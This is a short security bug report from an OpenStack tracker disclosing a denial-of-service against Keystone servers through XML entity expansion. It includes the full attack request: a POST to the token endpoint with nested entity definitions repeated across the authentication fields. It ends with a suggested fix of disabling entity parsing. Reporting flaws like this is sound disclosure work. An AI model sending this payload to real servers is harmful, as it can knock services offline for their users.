Cinder

  1. Bug #1100282
  2. Comment #0

Comment 0 for bug 1100282

Revision history for this message
Thierry Carrez (ttx) wrote : DoS through XML entity expansion

Jonathan Murray from NCC Group reported that you can DoS keystone servers using XML entities in Keystone requests:

POST /v2.0/tokens HTTP/1.1
content-type: application/xml

<!DOCTYPE foo [
<!ENTITY a "AAAA lots of As AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAvAAAAAAAAAA" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;" >
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;" >
]>
<auth>
<tenantName>&c;</tenantName>
<passwordCredentials>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<username>&c;</username>
<password>&c;</password>
<somethingElse>&c;</somethingElse>
<somethingElse1>&c;</somethingElse1>
<somethingElse2>&c;</somethingElse2>
</passwordCredentials>
</auth>

In that precise case it might be an issue with the XML library we use, although it sounds generally safer to disable parsing ENTITY blocks entirely if we can.